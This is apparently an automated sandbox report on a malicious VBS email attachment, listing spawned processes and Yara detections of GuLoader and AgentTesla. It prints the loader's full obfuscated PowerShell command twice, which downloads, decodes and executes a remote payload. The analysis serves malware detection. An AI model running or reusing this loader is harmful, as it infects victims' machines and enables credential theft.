                                                            Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Shipping Dcuments_CI PKL_HL_.vbs"
                                                            Imagebase:0x7ff6c99d0000
                                                            File size:170'496 bytes
                                                            MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:2
                                                            Start time:21:17:00
                                                            Start date:18/04/2024
                                                            Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                            Imagebase:0x7ff605670000
                                                            File size:496'640 bytes
                                                            MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                            Has elevated privileges:true
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:3
                                                            Start time:21:17:12
                                                            Start date:18/04/2024
                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Semiannually163 = 1;$Varityped='Substrin';$Varityped+='g';Function Spatiumet($Merotomy){$Ganglioma=$Merotomy.Length-$Semiannually163;For($Undereying136=5; $Undereying136 -lt $Ganglioma; $Undereying136+=(6)){$Stacc+=$Merotomy.$Varityped.Invoke($Undereying136, $Semiannually163);}$Stacc;}function Salsdren($Fortynd){. ($Fusionsaftaler) ($Fortynd);}$Morallovene=Spatiumet 'FindeM SlaboBed,mzGuiltiSu.nolUnforlVarmeaSkru /Afslr5 p yn.U aft0 Kost Al,og(DdsaaW,pitaiboo lnBrssedNusseoSem cwFremssDi eg ChattNPrethT,oren Supra1Abe.s0Guldv.Colou0Haema;Adria Br,dsWr creiFormanRefrn6Uncou4velar; Legi noncix non 6 Nikl4Synli; skri PseurGasm,vP,gts:Bj.rg1 Mo,i2Organ1Armad.Flask0Abs,i)Galo. r tscGSkyldeAktioc DionkNoncooSyske/,atin2Luged0Janse1Bul.p0fj.rn0E cin1Pante0Coope1Surro ,aineFFly eiUvi lr,readeRve,efDiphyoAphroxHarri/Bygn.1Eluls2Ebelt1Tra i.Perca0 Dupe ';$Anathematise=Spatiumet 'Lill,UFalhos SpleeP lorrFiske-OhsknAN.ighg Pawne MasknLechrtOnion ';$Aivr=Spatiumet 'FigurhpreintGer.rtVognppT.llas.onse:Lay u/Bi,le/ B.lldFinerrF.agti Bj,gvindpae.atte. .ilpgCanchoEuropo Educgwr telAfslaered.m.Bak ucK upvoPengem Vlve/AfstvupervecFrit ? k,noeLivewxminerp BelooTiltrrwind tU lia=BallodSankeoOp ftwKrvernDekodlKapreo OxydaHum.ld appl& ScariGeomedAmnio= Hudd1 DommOL.omeS ErroQGal,iaUdbetZKartolChanikRatapr Tink_ Clar7 Kna.hF.uevzspadspRovdy0DeminlAtomaSPh.liF PagiBProgr9 AergdTappejUdb t3FanmagFagblxDagplcN,ninEOutf.oUna.etCentr-Sikke9Figensbrain5Tyven ';$Succesombrust=Spatiumet 'Trykl>Polyh ';$Fusionsaftaler=Spatiumet 'af eniTankeeWattsxAl um ';$Pantebrevshandelen = Spatiumet ' ntee JerncWkdrehA johoL,xia D.ske%SvindaRa,tapDevonpButi,dCi,araOveretPennaaDef,n%Pragt\Flec.EFu,dvlsubapeProvicSortetIndicr TheooEb.lln TroueSup lg Panda .ogltReinsiDriftv Hypee Beci. At eS U.dihUng oaPer,i Patte&union& s.bl Hamm eOsterc KonghUn.pao Urba Lsnin$Pum.c ';Salsdren (Spatiumet 'Suppl$Enh.lgbolivlsemino uni,bBoligaSvulmlindsp: Plo,fTransl Tje,uRinglkGroovtRa eru JungeCatenr HovniGreennUndefgoutre=Himme(Tiltac EpokmXsford Ra.i Prova/datasc Deut Dext.$ mesiPJagteaBoligngelogt SkileBehanbEupherEnra.eL gtevCrustsisba.h DewaaHalopnChrisdSkakte RaillUdadreDec,lnPaatv)Antil ');Salsdren (Spatiumet ' Mist$ Ma,sgTilprl banko dashb.annyaKardslQuant:GeledACemennMaalet Bet.h,iltvr .ndkoAbamppA taco Pa lpPass hPa ahaTr,llgUbereiAgerbsGrns tforsii .airc E,ip=garvn$FratrASeraliArapavFenacrOttea.JournsmorbrpIntarlMandaiCou ttSuper(Skri $St noSAmp,iu NytacContrcRygraePunktsRecomo NavnmKhedabExsicrDametuRustbsUnddrtBesgs)T les ');$Aivr=$Anthropophagistic[0];Salsdren (Spatiumet 'Ov rm$CiphegOpskrlPromeoF rskbScollaAntiplF.ske:b skuFDrvleoafbrer Ulkss .rageFl esnAusredLigniedishblInsissTel.fe UndesDagceoSnapsmTilvekYdelsoShattsb odstAutoenMicreiGalannmindeg SladedopinrFyrin= itriNFa,ceeCellewPhono- SknlOHoussbplotnj Deple HydrcUn.stt Refr KonkuSBucrny.ecoms AffttNo gleSens mSa kt.BelieNOffsheRdseltBe or. Sco.WPoiaae IchtbGi maCKarikl.oostiOpildemedt,nBa.stt Flyd ');Salsdren (Spatiumet ',leek$BerigFPol to,efairPu pessymboeRussinmidd dCeltieDiamalUbesksForgie ites Beseo SkanmForlakBem.loDobbesGadertTouchnsterniShirtnUnoffgSeksae rbejrPalme.Ers aHBelyseManeuaOmniadSupereHewabrTelefsMot,t[ maxi$Kv ntA padrnTen.raBranctToresh,rgameLandlmSekreamyrmit AftriSa,dss T.awe pr.s]N.rin=P,lit$Es.reMNeglpoU derrLivegaja oulEuryglSuitioTiltrvanorge S.rvnDrvtye sh,p ');$Samosa=Spatiumet 'ConfiFSatsao emarrUnpolsPreseesacchn.ichwd Unsue Rgfol vicisMudroeUdenrsunderoFe,mimWe,dik SkruoRejecsBisamtLeeronfeignirustknDonkrgPettie P.anr ,ort.KlammD Ta,ooSal swGrms.nVirkelTurboo Synda A.lgdRikocFAstroi Calal,aneveBroch(Aquo.$.achiAMisgriK.yedvRejserUnpul,Lippi$ F blJ Te eaRetsbkUnsenkP,aine eknonGehe,)Drmme ';$Samosa=$fluktuering[1]+$Samosa;$Jakken=$fluktuering[0];Salsdren (Spatiumet 'Disso$ au.ogAkkrel Estlo .ippbNytteaStupelPmkha:UndefPBotuleRiposrFljtecSove,aSpeci= Tele(M.sicTModule,etersGenh.t Nedb-St,afP Pul,aVitaltBi.lehNitsk Line$BecooJ Orfealasttk.orlfkCost,eslughnSrege)Spalt ');while (!$Perca) {Salsdren (Spatiumet ' Udko$Al.ingStjfolSmickoValutbUnmonaRealelProf.:Rel.tIDrejedSnowseLagenn Se,ttDohiciAbsu.t,avebeGniddtSupers ommemPaatar.aagekIncaveH ldnsAgoni=mult.$LatertBagt.r M.saum.ljreObeys ') ;Salsdren $Samosa;Salsdren (Spatiumet ' CareSS.aldtTinneaAristrI dvatKomme-Oste.SAlbu.lTrumfeGuldse AfkapGoitc Boks4 oms ');Salsdren (Spatiumet 'Inds $GnavegPreexl MonsoKinetbjasesaRevislVario:drommP UndeeTher rBrewic Sm aarepos= O,er(ReinfTMetase MisfsMinvetRote,- IrriPIntelaArve.tSublah Supe Pyrhe$EnemrJ Badma AmtskVliesk Solne ,auhn Ci,c) Car ') ;Salsdren (Spatiumet ' Hrsi$KendegYn lilDyretoli,jebKantoa Han,lSkand:HighlLUnderuPathomResneb.utotuPaakrsH,eft=P.ior$Latiag RegnlUndero Ske,b Ma.daTrykkl ani:Ri gkBHemipeRepr,gSu.errWrencaCan.ivse ebe P,rglChecksStarteSkyhjsStrenkForesaReflep MurreDri ll ProplOrycteBrnefrLejeishande+O.tiu+,luxa%Zilli$TaxafAF rstn BalktAdganhsarder IronoDefacpFlugtoshillpVizorh Kabea LonggLuftii P,risAg.sttReshiiAutorcKrakk.Bra.lcTra ioRkemou nternInvestCodeb ') ;$Aivr=$Anthropophagistic[$Lumbus];}Salsdren (Spatiumet ' ,lan$FortsgInforlSelvio SkinbRanseaRohrnlAnekd: eminNcatasuPirozmNabobmscutceRerair Frnup MaullPaaskaTakstdEnunceA rornDoktosEleme Tast=eskad cadeG Copre AarmtS ffl-DitetCTestdos,linnstafft.aunueKalkbnVarmet Cond Pron,$SymboJP,nctaB,plak undekSquigeYarurnUbaad ');Salsdren (Spatiumet 'Tryne$A vecgLay rlNikoloI filb fkapaKontol Gkke:FerieSUnmigpMetreaAparttDelegtPalaelFlinkeVestidMaci. Mumme=Handy Pythi[ DileSReattyRevissred vtKollieU eldmMi op.PolteCSiennoCh,omnVauntv AngreMindsrMesost.llit]Apter:Somme: oragFAvicur k.sto NdspmOver B.viseaAnda.sH,droekonve6R,gne4 SnotS CasttInflurNonsei ConvnBussegScoli( sple$Omn,pN.uelouJournm FootmVita,eUdklarRespopRegislUdsaeaSuppldAm.anet,enenBekissVesic)Strej ');Salsdren (Spatiumet 'Annso$Be.aigMad.il Suggo,rimeb Fugta Kon,lU.pan:MarinSMiljtp rilsaBendlcMasseiBlankoGyropuphospsDberelMimicy Alp. Sdemn= stje Retti[ PneuSDebriyKnyt.s .aantE.seme kampmOtari.PredeT Stv,eLejekxCentrt Pupi.GramiE Un nnFibricFagfoo.ehondOpspuiFastenLithogIndi,]Basi,:herov: M.thAJobbeSEyewaC AfifIIndisIHand,.AlgotGSkraleAraertTerriSPapritToskirI dbriLazarnvrkstgattro(Bedst$Ho,edS,enzppS,angaElgabtRunddt AktilB.gheeGlaned nder)Telec ');Salsdren (Spatiumet 'Nuanc$SicilgBladelTil,roi stabMuta,aCandllPorr,:MenneESpejlpTilreiCassosSkrespIndfra Ly.psAnal tScrabiD,miccM,lie=Tarif$ RdhaSPandepHalslaC.stoc TragiAfmaroSeconu Av ssRe oglUnderyPedes.Un,onsTilleuMati b.ejltsFri et GosprP,ryni Qu cnRes,rgadopt(Polys2 ilis9Brudf2Ka,in8Rteb.4Mobil6dtr n,,rusi2Mulig8Under3Smel,5Tel,g8Faneb) nmed ');Salsdren $Epispastic;"
                                                            Imagebase:0x7ff6cb6b0000
                                                            File size:452'608 bytes
                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000003.00000002.2255196351.00000250CBDD2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:4
                                                            Start time:21:17:12
                                                            Start date:18/04/2024
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff6ee680000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:5
                                                            Start time:21:17:15
                                                            Start date:18/04/2024
                                                            Path:C:\Windows\System32\cmd.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Electronegative.Sha && echo $"
                                                            Imagebase:0x7ff7dedd0000
                                                            File size:289'792 bytes
                                                            MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:7
                                                            Start time:21:17:21
                                                            Start date:18/04/2024
                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Semiannually163 = 1;$Varityped='Substrin';$Varityped+='g';Function Spatiumet($Merotomy){$Ganglioma=$Merotomy.Length-$Semiannually163;For($Undereying136=5; $Undereying136 -lt $Ganglioma; $Undereying136+=(6)){$Stacc+=$Merotomy.$Varityped.Invoke($Undereying136, $Semiannually163);}$Stacc;}function Salsdren($Fortynd){. ($Fusionsaftaler) ($Fortynd);}$Morallovene=Spatiumet 'FindeM SlaboBed,mzGuiltiSu.nolUnforlVarmeaSkru /Afslr5 p yn.U aft0 Kost Al,og(DdsaaW,pitaiboo lnBrssedNusseoSem cwFremssDi eg ChattNPrethT,oren Supra1Abe.s0Guldv.Colou0Haema;Adria Br,dsWr creiFormanRefrn6Uncou4velar; Legi noncix non 6 Nikl4Synli; skri PseurGasm,vP,gts:Bj.rg1 Mo,i2Organ1Armad.Flask0Abs,i)Galo. r tscGSkyldeAktioc DionkNoncooSyske/,atin2Luged0Janse1Bul.p0fj.rn0E cin1Pante0Coope1Surro ,aineFFly eiUvi lr,readeRve,efDiphyoAphroxHarri/Bygn.1Eluls2Ebelt1Tra i.Perca0 Dupe ';$Anathematise=Spatiumet 'Lill,UFalhos SpleeP lorrFiske-OhsknAN.ighg Pawne MasknLechrtOnion ';$Aivr=Spatiumet 'FigurhpreintGer.rtVognppT.llas.onse:Lay u/Bi,le/ B.lldFinerrF.agti Bj,gvindpae.atte. .ilpgCanchoEuropo Educgwr telAfslaered.m.Bak ucK upvoPengem Vlve/AfstvupervecFrit ? k,noeLivewxminerp BelooTiltrrwind tU lia=BallodSankeoOp ftwKrvernDekodlKapreo OxydaHum.ld appl& ScariGeomedAmnio= Hudd1 DommOL.omeS ErroQGal,iaUdbetZKartolChanikRatapr Tink_ Clar7 Kna.hF.uevzspadspRovdy0DeminlAtomaSPh.liF PagiBProgr9 AergdTappejUdb t3FanmagFagblxDagplcN,ninEOutf.oUna.etCentr-Sikke9Figensbrain5Tyven ';$Succesombrust=Spatiumet 'Trykl>Polyh ';$Fusionsaftaler=Spatiumet 'af eniTankeeWattsxAl um ';$Pantebrevshandelen = Spatiumet ' ntee JerncWkdrehA johoL,xia D.ske%SvindaRa,tapDevonpButi,dCi,araOveretPennaaDef,n%Pragt\Flec.EFu,dvlsubapeProvicSortetIndicr TheooEb.lln TroueSup lg Panda .ogltReinsiDriftv Hypee Beci. At eS U.dihUng oaPer,i Patte&union& s.bl Hamm eOsterc KonghUn.pao Urba Lsnin$Pum.c ';Salsdren (Spatiumet 'Suppl$Enh.lgbolivlsemino uni,bBoligaSvulmlindsp: Plo,fTransl Tje,uRinglkGroovtRa eru JungeCatenr HovniGreennUndefgoutre=Himme(Tiltac EpokmXsford Ra.i Prova/datasc Deut Dext.$ mesiPJagteaBoligngelogt SkileBehanbEupherEnra.eL gtevCrustsisba.h DewaaHalopnChrisdSkakte RaillUdadreDec,lnPaatv)Antil ');Salsdren (Spatiumet ' Mist$ Ma,sgTilprl banko dashb.annyaKardslQuant:GeledACemennMaalet Bet.h,iltvr .ndkoAbamppA taco Pa lpPass hPa ahaTr,llgUbereiAgerbsGrns tforsii .airc E,ip=garvn$FratrASeraliArapavFenacrOttea.JournsmorbrpIntarlMandaiCou ttSuper(Skri $St noSAmp,iu NytacContrcRygraePunktsRecomo NavnmKhedabExsicrDametuRustbsUnddrtBesgs)T les ');$Aivr=$Anthropophagistic[0];Salsdren (Spatiumet 'Ov rm$CiphegOpskrlPromeoF rskbScollaAntiplF.ske:b skuFDrvleoafbrer Ulkss .rageFl esnAusredLigniedishblInsissTel.fe UndesDagceoSnapsmTilvekYdelsoShattsb odstAutoenMicreiGalannmindeg SladedopinrFyrin= itriNFa,ceeCellewPhono- SknlOHoussbplotnj Deple HydrcUn.stt Refr KonkuSBucrny.ecoms AffttNo gleSens mSa kt.BelieNOffsheRdseltBe or. Sco.WPoiaae IchtbGi maCKarikl.oostiOpildemedt,nBa.stt Flyd ');Salsdren (Spatiumet ',leek$BerigFPol to,efairPu pessymboeRussinmidd dCeltieDiamalUbesksForgie ites Beseo SkanmForlakBem.loDobbesGadertTouchnsterniShirtnUnoffgSeksae rbejrPalme.Ers aHBelyseManeuaOmniadSupereHewabrTelefsMot,t[ maxi$Kv ntA padrnTen.raBranctToresh,rgameLandlmSekreamyrmit AftriSa,dss T.awe pr.s]N.rin=P,lit$Es.reMNeglpoU derrLivegaja oulEuryglSuitioTiltrvanorge S.rvnDrvtye sh,p ');$Samosa=Spatiumet 'ConfiFSatsao emarrUnpolsPreseesacchn.ichwd Unsue Rgfol vicisMudroeUdenrsunderoFe,mimWe,dik SkruoRejecsBisamtLeeronfeignirustknDonkrgPettie P.anr ,ort.KlammD Ta,ooSal swGrms.nVirkelTurboo Synda A.lgdRikocFAstroi Calal,aneveBroch(Aquo.$.achiAMisgriK.yedvRejserUnpul,Lippi$ F blJ Te eaRetsbkUnsenkP,aine eknonGehe,)Drmme ';$Samosa=$fluktuering[1]+$Samosa;$Jakken=$fluktuering[0];Salsdren (Spatiumet 'Disso$ au.ogAkkrel Estlo .ippbNytteaStupelPmkha:UndefPBotuleRiposrFljtecSove,aSpeci= Tele(M.sicTModule,etersGenh.t Nedb-St,afP Pul,aVitaltBi.lehNitsk Line$BecooJ Orfealasttk.orlfkCost,eslughnSrege)Spalt ');while (!$Perca) {Salsdren (Spatiumet ' Udko$Al.ingStjfolSmickoValutbUnmonaRealelProf.:Rel.tIDrejedSnowseLagenn Se,ttDohiciAbsu.t,avebeGniddtSupers ommemPaatar.aagekIncaveH ldnsAgoni=mult.$LatertBagt.r M.saum.ljreObeys ') ;Salsdren $Samosa;Salsdren (Spatiumet ' CareSS.aldtTinneaAristrI dvatKomme-Oste.SAlbu.lTrumfeGuldse AfkapGoitc Boks4 oms ');Salsdren (Spatiumet 'Inds $GnavegPreexl MonsoKinetbjasesaRevislVario:drommP UndeeTher rBrewic Sm aarepos= O,er(ReinfTMetase MisfsMinvetRote,- IrriPIntelaArve.tSublah Supe Pyrhe$EnemrJ Badma AmtskVliesk Solne ,auhn Ci,c) Car ') ;Salsdren (Spatiumet ' Hrsi$KendegYn lilDyretoli,jebKantoa Han,lSkand:HighlLUnderuPathomResneb.utotuPaakrsH,eft=P.ior$Latiag RegnlUndero Ske,b Ma.daTrykkl ani:Ri gkBHemipeRepr,gSu.errWrencaCan.ivse ebe P,rglChecksStarteSkyhjsStrenkForesaReflep MurreDri ll ProplOrycteBrnefrLejeishande+O.tiu+,luxa%Zilli$TaxafAF rstn BalktAdganhsarder IronoDefacpFlugtoshillpVizorh Kabea LonggLuftii P,risAg.sttReshiiAutorcKrakk.Bra.lcTra ioRkemou nternInvestCodeb ') ;$Aivr=$Anthropophagistic[$Lumbus];}Salsdren (Spatiumet ' ,lan$FortsgInforlSelvio SkinbRanseaRohrnlAnekd: eminNcatasuPirozmNabobmscutceRerair Frnup MaullPaaskaTakstdEnunceA rornDoktosEleme Tast=eskad cadeG Copre AarmtS ffl-DitetCTestdos,linnstafft.aunueKalkbnVarmet Cond Pron,$SymboJP,nctaB,plak undekSquigeYarurnUbaad ');Salsdren (Spatiumet 'Tryne$A vecgLay rlNikoloI filb fkapaKontol Gkke:FerieSUnmigpMetreaAparttDelegtPalaelFlinkeVestidMaci. Mumme=Handy Pythi[ DileSReattyRevissred vtKollieU eldmMi op.PolteCSiennoCh,omnVauntv AngreMindsrMesost.llit]Apter:Somme: oragFAvicur k.sto NdspmOver B.viseaAnda.sH,droekonve6R,gne4 SnotS CasttInflurNonsei ConvnBussegScoli( sple$Omn,pN.uelouJournm FootmVita,eUdklarRespopRegislUdsaeaSuppldAm.anet,enenBekissVesic)Strej ');Salsdren (Spatiumet 'Annso$Be.aigMad.il Suggo,rimeb Fugta Kon,lU.pan:MarinSMiljtp rilsaBendlcMasseiBlankoGyropuphospsDberelMimicy Alp. Sdemn= stje Retti[ PneuSDebriyKnyt.s .aantE.seme kampmOtari.PredeT Stv,eLejekxCentrt Pupi.GramiE Un nnFibricFagfoo.ehondOpspuiFastenLithogIndi,]Basi,:herov: M.thAJobbeSEyewaC AfifIIndisIHand,.AlgotGSkraleAraertTerriSPapritToskirI dbriLazarnvrkstgattro(Bedst$Ho,edS,enzppS,angaElgabtRunddt AktilB.gheeGlaned nder)Telec ');Salsdren (Spatiumet 'Nuanc$SicilgBladelTil,roi stabMuta,aCandllPorr,:MenneESpejlpTilreiCassosSkrespIndfra Ly.psAnal tScrabiD,miccM,lie=Tarif$ RdhaSPandepHalslaC.stoc TragiAfmaroSeconu Av ssRe oglUnderyPedes.Un,onsTilleuMati b.ejltsFri et GosprP,ryni Qu cnRes,rgadopt(Polys2 ilis9Brudf2Ka,in8Rteb.4Mobil6dtr n,,rusi2Mulig8Under3Smel,5Tel,g8Faneb) nmed ');Salsdren $Epispastic;"
                                                            Imagebase:0x5e0000
                                                            File size:433'152 bytes
                                                            MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000007.00000002.2066487605.0000000008580000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000007.00000002.2054965837.0000000005C45000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000007.00000002.2067203805.000000000A2B0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:8
                                                            Start time:21:17:22
                                                            Start date:18/04/2024
                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Electronegative.Sha && echo $"
                                                            Imagebase:0xa40000
                                                            File size:236'544 bytes
                                                            MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            General

                                                            Target ID:11
                                                            Start time:21:17:44
                                                            Start date:18/04/2024
                                                            Path:C:\Program Files (x86)\Windows Mail\wab.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Program Files (x86)\windows mail\wab.exe"
                                                            Imagebase:0xcf0000
                                                            File size:516'608 bytes
                                                            MD5 hash:251E51E2FEDCE8BB82763D39D631EF89
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000002.2782121824.0000000022FEB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 0000000B.00000002.2765371278.0000000005800000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.2782121824.0000000022FC5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000002.2782121824.0000000022FC5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                            Reputation:moderate
                                                            Has exited:false

                                                            Disassembly

                                                            Reset < >

                                                              Executed Functions

                                                              Function 00007FFB4B24B596 Relevance: .5, Instructions: 476COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2276162493.00007FFB4B240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B240000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_7ffb4b240000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a6166c18116253b48bcc7d8dc1205bcdb51be53e8970af52e25c27d3d2095ec4
                                                              • Instruction ID: c9c4cd09c3595161cf70fdae3d1bd65d4c490f6f3b9fa5a9ad68d257903edecf
                                                              • Opcode Fuzzy Hash: a6166c18116253b48bcc7d8dc1205bcdb51be53e8970af52e25c27d3d2095ec4
                                                              • Instruction Fuzzy Hash: 3BF1947090CA4D8FEBA9EF28CC557E97BE1FF58310F04826AD84DC7691DB34A9458B81
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00007FFB4B24C342 Relevance: .5, Instructions: 463COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2276162493.00007FFB4B240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B240000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_7ffb4b240000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: bf9d99429593d56f7870c83da9856e86f796888e6d551341f9a4714960253bcd
                                                              • Instruction ID: 1b8205a32773aa422e86d5e65590301dcd28274398f779bd745efebfe92cab80
                                                              • Opcode Fuzzy Hash: bf9d99429593d56f7870c83da9856e86f796888e6d551341f9a4714960253bcd
                                                              • Instruction Fuzzy Hash: 4AE1B27090CA4E8FEBA8EF28C8557F97BD1FF54310F04826AD84DC7691DE78A9458B81
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00007FFB4B24CAA0 Relevance: 1.5, Strings: 1, Instructions: 274COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2276162493.00007FFB4B240000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B240000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_7ffb4b240000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: hGK
                                                              • API String ID: 0-692063951
                                                              • Opcode ID: 6f36a4329c9da54fce4941ee5b5c6aac70149bcac013ef66de4350316e490ba1
                                                              • Instruction ID: 1a210a3c6a6932368ad104629f14f0867d56cb9b949efe2caf7fa7712baf8c6f
                                                              • Opcode Fuzzy Hash: 6f36a4329c9da54fce4941ee5b5c6aac70149bcac013ef66de4350316e490ba1
                                                              • Instruction Fuzzy Hash: 028159B061CA594FE799FF2CC494AB5BBD1EF95350B1042BDD08AC36A6DA25F842C780
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00007FFB4B3140B9 Relevance: .4, Instructions: 437COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2277106319.00007FFB4B310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B310000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_7ffb4b310000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 74528d70bd0c4586e1d5cec30b2a3614e90b64b5236c792afea0873d95189d60
                                                              • Instruction ID: d159d9b4ac17e92714b7aaf2f110dce5dd61cb7649a27d0ed7d7563d3980a64d
                                                              • Opcode Fuzzy Hash: 74528d70bd0c4586e1d5cec30b2a3614e90b64b5236c792afea0873d95189d60
                                                              • Instruction Fuzzy Hash: 6AD165B290EB8A0FEB95EF3DC8651B47BE5EF55310B0841FAD54CC71E3DA1898468B41
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00007FFB4B31529D Relevance: .4, Instructions: 367COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2277106319.00007FFB4B310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B310000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_7ffb4b310000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5c3530e5b72695f6bd32d6c352f26515ab7db006584d617ac0a367a9ccc7eea8
                                                              • Instruction ID: 1caefd253eab816ee9ecc5ade9eca1781593bd30a62c51b99381a53cb8b022b2
                                                              • Opcode Fuzzy Hash: 5c3530e5b72695f6bd32d6c352f26515ab7db006584d617ac0a367a9ccc7eea8
                                                              • Instruction Fuzzy Hash: 2FB1A7B290EB8A0FE7A5EF3988552B57FE5EF45220B0901FBD04DC71A3DE189C058391
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00007FFB4B314257 Relevance: .2, Instructions: 157COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.2277106319.00007FFB4B310000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B310000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_7ffb4b310000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: bf2391d56276045433aa8169566b3bd55f4ee82bfdc841ab23af847621222862
                                                              • Instruction ID: 6eca17d5bf8bfd41c38452a2e46afcc9f9194e30d6830723aca138ec6eb20269
                                                              • Opcode Fuzzy Hash: bf2391d56276045433aa8169566b3bd55f4ee82bfdc841ab23af847621222862
                                                              • Instruction Fuzzy Hash: EB4168A280EE8A0FE7E5EF3DC8601786AD6AF51260B5845F9D14CC31E3DE189C458B41
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

